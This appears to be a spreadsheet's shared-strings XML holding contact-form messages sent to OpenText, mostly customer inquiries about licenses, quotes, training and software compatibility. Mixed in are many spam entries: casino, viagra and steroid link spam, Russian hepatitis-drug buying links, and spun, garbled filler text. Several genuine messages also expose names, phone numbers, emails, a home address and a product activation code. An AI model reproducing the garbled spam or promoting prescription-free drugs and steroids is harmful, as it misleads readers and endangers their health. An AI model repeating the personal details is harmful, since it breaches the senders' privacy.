    <t>we are a client using RightFax solution. We want list of Partners and their contact details on Saudi Arabia or Middle East to renew of expire license. We don't like to renew our license through your partners "SquireOne" any more. want any other partner.</t>
  </si>
  <si>
    <t>There is a training requirement on "captiva input accel 7.1"._x000D_
Please share course content, trainer profile and cost for the same._x000D_
_x000D_
This is for one associate in Pune and another associate at onsite. Hence online/webex based training also will do._x000D_
 Kindly suggest.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
This is Ahmad, Strategic Partnership Manager from iHorizons group, a leading IT company in Qatar, serving a large number of clients such as Ooredoo and Aljazeera. We have an opportunity related to ECM "E-filing System for Data Statistical and Web Reporting"  where we need to partner with a leading company to increase our competitiveness in winning such tender. Moreover, we can discuss the relationship between us if we think this could be a value added to both of us. Please let me know if you are interested in discussing this more? so as I can share more information._x000D_
Please note that the client is looking for some references in similar projects and Middle east references. Also the system should support English and Arabic </t>
  </si>
  <si>
    <t>_x000D_
Hi,_x000D_
I'd like to know about technical deep dive sessions on Opentext products like Teleform and the likes around the time of the innovation tour in Johannesburg, and how I could gain access to them._x000D_
Thanks in advance_x000D_
Willie Visagie</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://playcasinoonline24.com/]cassino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>I've been working as testing professional for almost 6.9 years, currently working for Infosys.Ive resigned from my current position and looking for new opportunities while serving notice period._x000D_
I would welcome if there is any opportunity in your organisation.  You can contact me by phone: 7353558855 or by email at karthik.h.r1312@gmail.com_x000D_
_x000D_
Current organisation-Infosys_x000D_
Location-Bangalore,India_x000D_
Notice period- 24 days (Already serving notice period)_x000D_
_x000D_
Regards,_x000D_
Karthik_x000D_
7353558855</t>
  </si>
  <si>
    <t>Liebes Support-Team,_x000D_
_x000D_
ich bin im Besitz einer gültigen CTD Lizenz und möchte meine Entwicklungsumgebung von Windows XP auf Windows 10 portieren. Dazu bräuchte ich die Installationsdateien der Version 4.2.0 Build Build 13978. Könnten Sie mir diese Bitte zur Verfügung stellen._x000D_
_x000D_
Viele Grüße und vielen Dank_x000D_
_x000D_
Thomas Kowalski_x000D_
----------------------------------------------------------------------------------_x000D_
Thomas Kowalski_x000D_
Kirchstr. 29_x000D_
59602 Rüthen-Kallenhardt_x000D_
Germany_x000D_
_x000D_
eMail: 	thomas@thomaskowalski.com_x000D_
office:	+49 2902 6778994_x000D_
private:	+49 2902 6778997_x000D_
mobile:  	+49 152 53100176</t>
  </si>
  <si>
    <t>Bonjour Pouvez vous me dire si vous distribuez seul votre solution Infofusion ou bien si vous avez des partenaires de vente de ce produit ? _x000D_
Merci</t>
  </si>
  <si>
    <t>The form on nfs client to get a trial doesn't work, so i cannot get the trial. Could you help me please? I tried with different browsers and computers.</t>
  </si>
  <si>
    <t>Hallo,_x000D_
_x000D_
wir benötigen Unterstützung für unseren Archive Server (IXOS Archive 10.5.0) um die Domäne zu ändern (Firmenzusammenschluss, mehrere Domänen werden in eine neue migriert, unter anderem auch die Domäne in der sich der Archivserver befindet), zeitgleich würden wir gerne den Server virtualisieren (veraltete Hardware). Bitte um Kontaktaufnahme um abzuklären, was das für uns bedeutet und welche Kosten auf uns zukommen._x000D_
_x000D_
Vielen Dank!_x000D_
_x000D_
lg_x000D_
Stefan Fürst</t>
  </si>
  <si>
    <t>Please quote Brava DWG Viewer Software as soon as possible.</t>
  </si>
  <si>
    <t>Sent me link to download latest bversion of opentext Exceed as we are having some problems with Windows 10 machines after updates</t>
  </si>
  <si>
    <t>Gupta development suite  8957C87A-156E856E-97FB6644-CA7A45E7  ls GUPTA Team Developer 2005.1  we have product activation code errors</t>
  </si>
  <si>
    <t>Need access to forums where Open Text  Streamserve v16 ( Document Presentment) issues are posted.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to compare drawing by using Brava! Desktop, and compare with a few thousands of drawing. For such demand, Could I utilize Brava Batch? </t>
  </si>
  <si>
    <t>We have a Customer Demo in one of the client in Europe, we are proposing the VIM solutions for AP. Just want to know the latest version of VIM and Functionalities on S4/HANA Platform.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We'd like to quickly get a quote to your solution adapted to satisfy our requirements._x000D_
_x000D_
Can we organise a demo and meeting to discuss them in the next few days?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>viagra prices usa pharmacies [url=http://jud10.org/]liquid viagra for men side effects[/url] _x000D_
viagra coupons 2016 [url=http://viagrawithoutadoctorprescription.com/]viagra side effects mayo[/url] _x000D_
 _x000D_
viagra commercial &lt;a href="http://jud10.org/"&gt;what are generic names for viagra&lt;/a&gt; _x000D_
low dose viagra for men trying to conceive &lt;a href="http://viagrawithoutadoctorprescription.com/"&gt;viagra without doctor prescription&lt;/a&gt;</t>
  </si>
  <si>
    <t>My name is James M Sula and I work for Business IT Source, we are an IT consulting group that has been hired by Trustmark Insurance of Lake Forest Illinois to review every application for Windows desktop and server compatibility in their environment._x000D_
 _x000D_
Trustmark currently has your applications installed.  We would like to verify if the application is fully Microsoft Windows 10 compatible, and if not can you provide information of the versions that are compatible._x000D_
_x000D_
Scan Manager	2.0</t>
  </si>
  <si>
    <t>My login does not allow me to see any links for support. Can you please see whats wrong._x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi, I want to buy Gupta Report Builder. I can`t find where to buy it. Please contact me. Thank You.</t>
  </si>
  <si>
    <t>Are you considering speakers?_x000D_
_x000D_
I have used RightFax for years and talk extensively on performance, availability, and upgrades._x000D_
PS if I can't get in for a speaker, can you give me a free pass to network and promote context_x000D_
_x000D_
Thanks Greg</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>Please we are urgently in need of an event management firm in your city to help provide management services for our upcoming program from 11th of September till 14th of September, 2018. Kindly contact us for more details. Thank you</t>
  </si>
  <si>
    <t>We have a very large client looking to do a RFI process on utilizing Rightfax to bring their fax solution in-house. Volume us ~300 million pages a year. Please contact me ASAP</t>
  </si>
  <si>
    <t>Cotação de um fax server</t>
  </si>
  <si>
    <t xml:space="preserve">During the 2004 off-season, Beltran was a free agent but the Yankees passed on him and instead trade.played third, Davis spent all of 2015 at Class A-Advanced Lancaster in the hitter-friendly California League.And yeah, you could say that with the temporary loss of Ervin Santana from the already thin rotation, the Twins could really have used an ace like Darvish. _x000D_
[url=http://www.hello24x7.com/indox.asp?p_id=plastic-shirt]plastic shirt[/url]_x000D_
[url=http://www.hello24x7.com/indox.asp?p_id=soccer-ronaldo-cleats]soccer ronaldo cleats[/url]_x000D_
 _x000D_
The power play cashed in again when Marcus Johansson one-timed a pass from Oshie past goaltender Ben Bishop for the game-winning goal with six minutes remaining.Ovechkin also led the team in playoff scoring with 12 points. _x000D_
In 2001 Vinsanity was in full-effect as Vince Carter was voted a starter in that year’s All-Star game._x000D_
</t>
  </si>
  <si>
    <t>Amgen, Inc. is looking for a global digital HR documentation solution. Who can we contact for additional information?</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino slots&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>We are interested in learning more about OpenText OTMM and OpenText MediaBin as a Digital Asset Management solution for our company. We manage thousands of digital assets comprised of image, video and audio files. We are looking for a tool that can manage the production workflow &amp; notifications &amp; file taggging, as well as integrate with a separate storage system (or store files as well). One option we are exploring is integrating OpenText OTMM with GitLab for storage.  Or understand the advantages of the stand alone OpenText Media Bin as an alternative.  I would like to setup a demo meeting with you and include someone from our Architecture team to discuss what you have to offer.</t>
  </si>
  <si>
    <t>Hello,_x000D_
  One of my Papercut MF clients is in progress of demoing Rightfax on a Ricoh MFP.  They have the smart panel app, and have been talking to rightfax directly to get support of the demo.  I have been tasked with seeing if Rightfax and Papercut can share login, if a user logs into Papercut can the rightfax app see the logged in user?  Do you have any documentation on this setup?_x000D_
  The customer is Eau Claire School District._x000D_
Thanks_x000D_
Ed OWens</t>
  </si>
  <si>
    <t>Trying to find pricing for odentext axcelerate. We are a small business 5-10 employees. I want to see if this product is viable for our size. Please email back response and do not sales call me.</t>
  </si>
  <si>
    <t>We were looking for a solution to something and we ran across EMC legato DiskXtender, it seems like it would do exactly what we are looking for. I contacted Dell (as they OWN EMC now) and they said they sold this product to you. I was wondering about availably on this software and cost behind it. Thank you !</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to reach someone regarding purchasing addition licenseing for Cool .  We current own 300 and would like to find out pricing for additional 300 or an enterprise solution.  I am tryhing to get a quote for these. The contact I have is Shelley Clark from Renewals department but have not had a response.  My Renewal reference RC218612. </t>
  </si>
  <si>
    <t xml:space="preserve">I need to update my credit card info on my fax2mail account but it keeps saying it's unable to process.  How do I update it?_x000D_
</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>EvilDavid0826 you_x000D_
_x000D_
Mclarenault 80 rewards given 2 days prior_x000D_
_x000D_
i won't equal begin to choose the words to spell it out specifically how jaw dropping them fella was regarded as. i have been you should always surely horrendous at technology nonetheless,however it he advocated me in addition,yet motivated me in [url=http://www.1mobile.com/qpid-network-dating-2880966.html]QPID network[/url] 11th level usual chemical make up that much which i took a little the mans AP training the software in 12th aced. He published me an awfully pleasant 5 passage tip note which will solved the problem get good scholarships along with job bargains. the guy did a new lot when it comes to various college students, the teachers and thus urban world by and large will be a very grim shop devoid of your boyfriend. it isn't really much more image of that person yet unfortunately i think it includes his fabulous, quirky spontaneity._x000D_
_x000D_
see, we a whole lot the opposite valuable experience. hord am among the, well my personal genuine, the very least desired off shoot. through the mid collection raider, there are many reasons for this._x000D_
_x000D_
this doable to compete if you were extraordinarily fortunately or if master trash M+: I have on really feel I overseen very many old watches parses this type of growth, This is fairly rare for my part, i started bogged down within a 85 90 range in most of competitions. more interested in truly acts, my best analytics weren too far off. it just difficult to play competitively with twin 980 EoCs coupled with Singed Fangs._x000D_
_x000D_
RNG legendaries: as mentioned, this is an awful platform._x000D_
_x000D_
AP mill : Especially not too long ago, bonk MoS by the way._x000D_
_x000D_
M+ just how: don't ever delivers right now there ended up being an extra guild destructive job to my advice in comparison with what cliques in guilds. sensible lord I hated this is what. GAHHHHHHHHH_x000D_
_x000D_
Cora scrolled more affordable this poster so, who invented. the woman didn know that they had purchased ahold of the im</t>
  </si>
  <si>
    <t>need download for 10.6 FP3</t>
  </si>
  <si>
    <t>I submitted an application for the Jr Graphic Designer position listed on Indeed._x000D_
_x000D_
I'm preparing for the upcoming academic year in Advertising and Marketing Communications at Conestoga College School of Media and Design, and working on my application for Second Career. It is requesting that I interview up to 3 employers and employees in the industry I'm pursuing. If you have 10-15 minutes to spare to fill out a small questionnaire that would be wonderful, but I understand if you have a full schedule and can't. I've attached the questionnaire as a word doc, as well as my resume with the application mentioned above. Thank you sincerely for your time, it is very much appreciated.  _x000D_
_x000D_
Hope you're having a good day!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Chad Gillen</t>
  </si>
  <si>
    <t>Our scanning stations lost communication with our Kofax Servers.</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
ARYZTA LLC, a US-based manufacturer of frozen bakery goods, is requesting a 2017 revision Form W-8BEN-E from its foreign vendors. Please contact Diana Tang at (510) 667-6187 with any inquiries. Thank you for your cooperation.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to purchase the Brava desktop reader, $49.00 + $10.00 maintenance.  We are a school district so we use purchase orders.  What method would I need to do to purchase this product from you.  Thanks  Gene Birdsell </t>
  </si>
  <si>
    <t>You say that data collection is optional so please explain the "opt out" option. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Видеоматериалы о лечение гепатитов, схемы терапии, научные материалы!  _x000D_
 _x000D_
&lt;a href=https://hcv-forum.ru/&gt;гепатит с препараты для лечения 2016&lt;/a&gt;_x000D_
 _x000D_
[url=https://www.hcv-forum.ru/novosti-issledovaniy-i-razrabotok-v-mire-f27/gilead-snizil-ceni-na-sofosbuvir-dlya-ukraini-t501.html]sovaldi sofosbuvir[/url]_x000D_
 _x000D_
[url=https://www.hcv-forum.ru/post89.html#p89]купить даклатасвир[/url]_x000D_
&lt;a href=https://www.hcv-forum.ru/post89.html#p89&gt;купить даклатасвир&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>shall we be departed from your the neck and throat in using 45_x000D_
_x000D_
a youngster arrives, nonetheless it is CNS not really completely progressed, or should it be till the 20s._x000D_
_x000D_
the little one may an adult and consequently sets out to lose minds, reasoning powers quantity, in addition,yet cognitive do the trick at age 45, sadly happiness become 100._x000D_
_x000D_
The individual lessens smart most decrepit over 6 years. the national retirement circle can expect your ex boyfriend to until eventually years 75, however,though he will be let go at age 50 as "way too used" (actually declared into several key phrases, and: "they'll forfeit iq, you've heard of,_x000D_
_x000D_
your next 55 a few years really are the twilight series zoom connected with presence up until he dies broke._x000D_
_x000D_
everything trueain't usually hence_x000D_
_x000D_
what is In so many?most recent brain clinical tests and studies are released to get used by the simply good these year in year out. I being used a large percentage of classes in addition versions of iq diagnostic tests previously a number of years._x000D_
_x000D_
creative data challenges will be among them. down the range of form of reasoning powers diagnosing available on the market, A single actual usually report in the alternate all new levels surrounding the heap, which each single is almost certainly made from completely different focus._x000D_
_x000D_
precisely what iq? Mathematically, It is the answer to a splitting hindrance. it is exactly what a quotient is. that is, our company is these are_x000D_
_x000D_
intellectual your age date equals reasoning powers _x000D_
_x000D_
for example, A daughter old 5 is tried possessing a Stanford Binet course WISC/WPPSI iq a college test by current administration combined with placed in the present rank 3rd rather than Kindergarten. so what's her iq? within my area of interest area, grade 3 means age ranges 8 up to 9 for reading detail choice. cause, without needing the intense test rating; which could girl's iq has become in 8/5 to help 9/5 or simply 1.60 which can 1.80, normally m</t>
  </si>
  <si>
    <t>We are looking to purchase your product for our large firm. We will be using Office 365, Win 10/ 64-bit. We need to know what version of your product we will need.</t>
  </si>
  <si>
    <t>I'm on the email security team at American Express.  We have noticed many of your fax2mail messages have been caught in our quarantine and would like to resolve the issue.  It appears the SPF record for reply dot fax dot aexp dot com will need to be adjusted.  _x000D_
_x000D_
Kind regards,_x000D_
Richard Fassett</t>
  </si>
  <si>
    <t xml:space="preserve">For the Human Resources team: is there a chance the position below could ever be remote? Thank you._x000D_
Product Marketing Specialist_x000D_
Ref#: P17039 </t>
  </si>
  <si>
    <t>I wanted to explore if we could work with Open Text and partner to sell a branded version of your "Open Text Redact It" solution?_x000D_
_x000D_
We have a UK wide customer base on a competitor redaction solution but we really like the Redact It solution and would be interested to chat with the Open Text Team to discuss if it would be feasible to sell a re-branded version of this within the UK and Ireland market?_x000D_
_x000D_
I look forward to hearing from you in due course._x000D_
_x000D_
Kind Regards_x000D_
_x000D_
John Sant_x000D_
+44 1565 873 918</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am contacting to inquire about if eDocs DM v10.0.0 and Records Management are fully supported by Windows 10, as our organization is currently using Windows 7, but planning a switch to Windows 10 in the near future._x000D_
_x000D_
Thanks,_x000D_
Matthew</t>
  </si>
  <si>
    <t>Hi,_x000D_
We were wondering if there is any news about the status of the resolution for article ID KB566719 (RightFax - Ability to Modify the Subject Line for ETransport Messages) since we have a customer who cannot at the moment upgrade from v 10.5 and we need to resolve the issue as soon as we can._x000D_
Tracking no:RF-9123_x000D_
Legacy article ID:39941917</t>
  </si>
  <si>
    <t>Explore using Opentext ECM platform as a single centralized place to manage, search, archive documents from all my systems.</t>
  </si>
  <si>
    <t>cost of generic viagra walgreens [url=http://jud10.org/]viagra[/url] _x000D_
viagra commercial black actress woman [url=http://viagrawithoutadoctorprescription.com/]youtube viagra commercial 2015[/url] _x000D_
 _x000D_
walmart cost of generic viagra &lt;a href="http://jud10.org/"&gt;generic viagra cost at walmart&lt;/a&gt; _x000D_
viagra prices in usa &lt;a href="http://viagrawithoutadoctorprescription.com/"&gt;viagra prices usa&lt;/a&gt;</t>
  </si>
  <si>
    <t>We're interested in learning more about your Content Suite Platform. It would be great if we could talk about this sometime within this week. Please let me know a good time for you guys.</t>
  </si>
  <si>
    <t xml:space="preserve">В данном разделе вы сможете узнать все о новых препаратах для лечения гепатита С, софосбувир, даклатасвир, велтапасвир, ледипасвир итд  _x000D_
 _x000D_
&lt;a href=https://www.hcv-forum.ru/vse-o-prepartah-dlya-lecheniya-gepatitov-f32/vosevi-vosevi-instrukciya-t1005.html&gt;инструкция софосбувир на русском&lt;/a&gt;_x000D_
 _x000D_
[url=https://hcv-forum.ru/page/naznacheno-lechenie-hronicheskogo-gepatita-s-n-nuzhno-kupit-gepcinat/?lang=en]воронеж купить гепцинат лп[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi, I just want to check requirements for Opentext Enterprise Connect Framework (64-bit) 10.5.2 is Windows 10 Pro (64-bit) + Office 265 Compliant ? Or are there special requirements to make it run ?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Interested in a POC to the Right Fax product. SAP integration required.</t>
  </si>
  <si>
    <t>DDS is proposing document management solutions to Ghana Customers. We would like to propose them eDOCS to our Legal Officers Customers. Our main engineer know eDOCS and has already installed it</t>
  </si>
  <si>
    <t>Sg. Damen und Herren, _x000D_
_x000D_
wir sind auf der Suche nach einem EDI Anbieter. Unser Unternehmen vertreibt biologische Lebensmittel, Kunden sind Rewe, Spar, Hofer, etc. Daher wird derzeit eine EDI Anbindung evaluiert. Ich ersuche um Kontaktaufnahme. _x000D_
_x000D_
Danke, Matthias Schodits</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
leider haben wir noch keine Rückmeldung auf unsere Kündigung zum 34. Abruf unseres Vertrags 214/72/2003-P bekommen. Diese wurde per Einschreiben am 20.04.2018 an Frau Karin Keil zugestellt._x000D_
_x000D_
Aus diesem Grund bitten wir um eine schnellst mögliche Kontaktaufnahme Ihrerseits und um Bestätigung der Kündigung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Tobias Zengerling</t>
  </si>
  <si>
    <t xml:space="preserve">Кто хочет отдать(продать) лекарства после терапии вам сюда!  _x000D_
 _x000D_
&lt;a href=https://hcv-forum.ru/&gt;hepcinat lp россии&lt;/a&gt;_x000D_
 _x000D_
[url=https://www.hcv-forum.ru/pomoshch-s-dostavkoy-licenzirovannih-preparatov-f17/velpanat-velasof-sofosvel-sof-led-sof-dak-asun-olisio-ekspressa-dostavka-rf-rb-kz-ua-kgz-pl-md-lat-lit-euro-t493.html]sofab lp купить[/url]_x000D_
</t>
  </si>
  <si>
    <t>Dear sirs,_x000D_
_x000D_
We are a new supplier for NMUK Sunderland and we have to create together with you an account with ID+ password in order to be able to receive from NMUK regularly orders via NMMUK!EDI._x000D_
Please communicate us which are the further steps in order to realize this connection._x000D_
_x000D_
Thank you._x000D_
_x000D_
With best regards,_x000D_
Delia Cioca</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am currently searching for a CMS-Agency in Finland which is an official Partner of OpenText for the WebSite Management product._x000D_
Can you recommend someone to me or point me to the list of partners?_x000D_
Markus</t>
  </si>
  <si>
    <t>I want to inform me about encryption in OpenText  Captiva</t>
  </si>
  <si>
    <t>OpenText Training</t>
  </si>
  <si>
    <t>We've used Brava Reader for more than 10 years in an in-house developed application and recently you've announced that Brava Reader will be discontinued.._x000D_
What we're looking for is to have a permanent licence for Brava ready as we don't have the source code for our application and thus affects our day-to-day operations._x000D_
_x000D_
We're ready to purchase it Brava Reader, so your support is highly appreciated here._x000D_
_x000D_
Note: we've tried Brava Desktop and unfortunately it's not working due to the changes in the DLL library used in the application vs Brava Reader library.</t>
  </si>
  <si>
    <t>Looking for training in OpenText Content Server Developer and OpenText Content Systems Administrator.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
durch Zufall bin ich auf Ihre Internetseite gestoßen und habe gesehen das Sie Archivierungsmöglichkeiten z.B. für Emails aus Outlook an SAP anbieten._x000D_
Können Sie mir bitte weitere Informationen, wie z.B.  eine elektronische Broschüre und eventuell auch Preislisten zukommen lassen?_x000D_
Vielen Dank im Voraus._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
i. A. Volker Peknice_x000D_
</t>
  </si>
  <si>
    <t>Hi, we are a real estate/construction company and we are looking for a document/content management system for our project in Islamabad, Pakistan. Contact us for further queries._x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Contacting for RightFax price. This is the third time,  trying to reach using contact form._x000D_
_x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Guten Morgen,_x000D_
ich interessiere mich für das Vendor Invoice Management für SAP._x000D_
Könnte ich hierzu bitte weitere Informationen erhalten._x000D_
- Wie erfolgt die Integration in SAP_x000D_
- Welche zusätzlichen Anforderungen Hardware/Software stellt das System_x000D_
- Welche Lizenzmetriken kommen zum Tragen._x000D_
- Welche Sprachen beherrscht das System_x000D_
_x000D_
Gibt es die Möglichkeit kurz die User Experience zu sehen (Video oder ähnliches)._x000D_
_x000D_
Aktuell ist eine Lösung für unsere Tochtergesellschaften in FR/CH gesucht. Wenn die Implementierung erfolgreich ist wäre ein Roll-Out in anderen Ländern ebenfalls denkbar._x000D_
_x000D_
Danke &amp; Grüße_x000D_
Thorsten Hugel</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren von opentext,_x000D_
_x000D_
für die Vaillant Group IT werde ich der zukünftige Ansprechpartner zum Thema opentext sein. Da ich in dem Bereich von ECM neu bin, informiere ich mich derzeit über Events. Unser interner Berater hat mich auch auf ein Event bei Ihnen in Grasbrunn aufmerksam gemacht. Allerdings finde ich nichts online. Können Sie mir Informationen zu allen anstehenden Veranstaltungen in Europa und besonders Deutschland zukommen lassen. Bevorzugt Tages- oder Mehrtagesveranstaltungen. _x000D_
_x000D_
Mit freundlichem Gruß_x000D_
Tatjana Wiest</t>
  </si>
  <si>
    <t>Good mornig, we would like to know if the software Opentext Imaging Windows Viewer 10.0.0 is compatible with Windows 10 Operating System. In addition, we wolud like to know which the last version of this software is. Could you please provide me this information?</t>
  </si>
  <si>
    <t xml:space="preserve">Дневники людей, проходящих противовирусную терапию. Сообщаем о ходе терапии, обсуждаем побочки, задаём вопросы прошедшим через всё это, делимся своим опытом  _x000D_
 _x000D_
&lt;a href=https://www.hcv-forum.ru/vse-o-prepartah-dlya-lecheniya-gepatitov-f32/instrukciya-k-daklatasvir-t597.html&gt;даклатасвир инструкция&lt;/a&gt;_x000D_
 _x000D_
[url=https://hcv-forum.ru/page/velpanat-velpanat-natco-lechenie-gepatita-cena-kupit/?lang=en]велпанат цена сегодня[/url]_x000D_
</t>
  </si>
  <si>
    <t>Question regd VAT on invoice SSE07112227. _x000D_
In connection with an audit we have discovered that invoice SSE07112227 was issued to CGI Norge AS, a Norwegian company, with Swedish VAT. Can you please confirm whether you are registered in Norway for VAT?_x000D_
_x000D_
br, _x000D_
Anne Aasgaard</t>
  </si>
  <si>
    <t>Dear Sirs, I wish to know if your product Brava! is able to read Autodesk® 3D models, offering the same functionalities of Autodesk ®'s Naviswork ® (like addressing of objects, touchable object, etc.). Can you, eventually, give me references, like youtube.com's video, on this theme? Thank you in advance. Best regards Giorgio Vacca</t>
  </si>
  <si>
    <t xml:space="preserve">Planning for  E DMS setup </t>
  </si>
  <si>
    <t xml:space="preserve">В данном разделе вы сможете узнать все о новых препаратах для лечения гепатита С, софосбувир, даклатасвир, велтапасвир, ледипасвир итд  _x000D_
 _x000D_
&lt;a href=https://www.hcv-forum.ru/vse-o-prepartah-dlya-lecheniya-gepatitov-f32/daclatasvir-soveti-po-provedeniyau-lechebnoy-terapii-gepatita-s-t175.html&gt;daclatasvir&lt;/a&gt;_x000D_
 _x000D_
[url=https://www.hcv-forum.ru/novosti-issledovaniy-i-razrabotok-v-mire-f27/gde-kitayskie-postavshchiki-sofosbuvir-ledipasvir-i-daclatasvir-popadaut-v-cepochku-postavok-lekarstv-protiv-gepatita-s-t879.html]ledipasvir sofosbuvir[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">В данном разделе вы сможете узнать все о новых препаратах для лечения гепатита С, софосбувир, даклатасвир, велтапасвир, ледипасвир итд  _x000D_
 _x000D_
&lt;a href=https://www.hcv-forum.ru/novosti-issledovaniy-i-razrabotok-v-mire-f27/gde-kitayskie-postavshchiki-sofosbuvir-ledipasvir-i-daclatasvir-popadaut-v-cepochku-postavok-lekarstv-protiv-gepatita-s-t879.html&gt;sofosbuvir daclatasvir ru&lt;/a&gt;_x000D_
 _x000D_
[url=https://hcv-forum.ru/]hepcinat lp цена в индии[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
  _x000D_
     I am a former employee of OpenText who worked in the Tinton Falls, NJ office.  I am writing because I never received information about Cobra healthcare coverage.  Who should I contact about this?  Please let me know as I am considering my options.  _x000D_
_x000D_
Thanks,_x000D_
Michael Cochran</t>
  </si>
  <si>
    <t xml:space="preserve">В данном разделе вы сможете узнать все о новых препаратах для лечения гепатита С, софосбувир, даклатасвир, велтапасвир, ледипасвир итд  _x000D_
 _x000D_
&lt;a href=https://www.hcv-forum.ru/pomoshch-s-dostavkoy-licenzirovannih-preparatov-f17/velpanat-deshevo-velasof-sofosvel-deshevo-sof-led-sof-dak-olisio-ekspressa-dostavka-v-rf-rb-kz-ua-kgz-pl-md-lat-lit-eu-t27.html&gt;инструкция ledihep на русском&lt;/a&gt;_x000D_
 _x000D_
[url=https://hcv-forum.ru/]гепатит с софосбувир и даклатасвир[/url]_x000D_
</t>
  </si>
  <si>
    <t>Dear Opentext partners team_x000D_
_x000D_
I hope you are well, it's a pleasure e-meeting you. Shai here from CHD Expert, worldwide leader in big data solutions for the foodservice industry._x000D_
_x000D_
I would love to have a call next week about your resturants data and how we could monetize it togther. Do you have any slot next Tuesday, Wednesday or Thursday?_x000D_
_x000D_
Looking forward to hearing from you._x000D_
_x000D_
All the best,_x000D_
Shai Rosenzweig</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.sparikh.co.in/css/move.php?company=515-Viagra-Farmacia-Precio,Viagra-Barata-Barcelona,Viagra-Barcelona-En-Mano]Viagra Farmacia Precio[/url]_x000D_
 Pre-plan a budget that you can establish in your new fashion wardrobes for each period. Understand that seasons come and go and this a couple of new garments are all you need each year. During the period of a few years you will get accumulated an widened clothing collection which you have a selection from._x000D_
  [url=http://www.piartworks.com/css/assets.php?recordID=187]Viagra For Sale Auckland[/url]_x000D_
 Consume food which nourishes your system along with your soul. Consider new food preparation techniques and quality recipes and chuckle once you are unsuccessful. This is a fun hobby which can help you to discover delicious techniques for getting all of the vitamins and minerals you want and keep yourself engaged. Remember, a malfunction indicates obtain!_x000D_
  [url=http://www.obpcxv.org.br/nova/list.php?po=364-buy-igf-lr3-australia,hygetropin-green-tops-200iu,human-growth-hormone-bodybuilding/]buy igf lr3 australia[/url]_x000D_
 Exhibit your personal treasures in your house to enhance the entire mood a bit. As opposed to using commercially made art work or trinkets, always keep some older child years playthings inside your cabinet. Or something your children manufactured you. Personalized goods will take up delighted thoughts and opinions once you have a look at them. So as opposed to wasting money on buying things, display stuff that are individual for you._x000D_
  [url=http://www.artbykath.com/feed/fold.php?cause=Viagra-50-Mg-Ervaringen-Wordt-Viagra-Goedkoper-Generieke-Viagra-Goedkoop-411/]Viagra 50 Mg Ervaringen[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.labarypinheiro.com.br/bemil/event.asp?lock=337]Achat Levitra 10mg[/url]_x000D_
 When marketing your home, constantly consider your personal safety and security. By no means enable a potential purchaser to your residence without a Real estate agent. They might be environment you up for any criminal offense. Also in no way abandon belongings out when displaying your house. This can be an wide open invites for any robbery._x000D_
  [url=http://www.metrofileholdings.com/pressthisz/cache.php?p=1561-Trenbolone-Acetate-Uk-Oxandrolone-Price-Usa-Trenbolone-Pills.html]Trenbolone Acetate Uk[/url]_x000D_
 Meditate to help keep your system working inside the most healthy and effective way. Meditating will help take control of your pressure. Chronic stress increases the danger of hypertension, stroke, cardiovascular disease, diabetic issues, ulcers, sleeplessness, muscle soreness and major depression. Evidently, tension is a medical condition that you must confer with your medical professional about._x000D_
  [url=http://www.jens-emc.dk/academia/director.php?inside=Testosterone-Booster-Methenolone-Oral-Tadalafil-Supplier-1202/]Testosterone Booster[/url]_x000D_
 You may have heard some thing about home schooling, yet not really comprehended the way it works. Educating your young ones in your own home can be a perfectly appropriate alternative to sending these people to a public or exclusive university. Before you get started, nonetheless, you need to know the fundamentals. Please read on for additional information._x000D_
  [url=http://chethanenterprise.com/data1/access.php?body=1197]Testosterone Base Powder Recipe[/url]_x000D_
</t>
  </si>
  <si>
    <t>How can I reinstall DWG Viewer 16.3</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.atlantiquegites.com/old/list.php?id=295-Buy-Trenbolone-Acetate-Tablets-Uk,Anavar-Oxandrolone-Tablets,Trenbolone-Enanthate-For-Sale-Uk]Buy Trenbolone Acetate Tablets Uk[/url]_x000D_
 Though it is a extensively debated subject matter, it is strongly suggested that the youngster get all needed shots. A few of the ailments that the child could possibly get when they will not get vaccinated can make them unwell or a whole lot worse, even eliminate them. This retains especially true for children who check out school, exactly where ailments are spread out a lot more speedily._x000D_
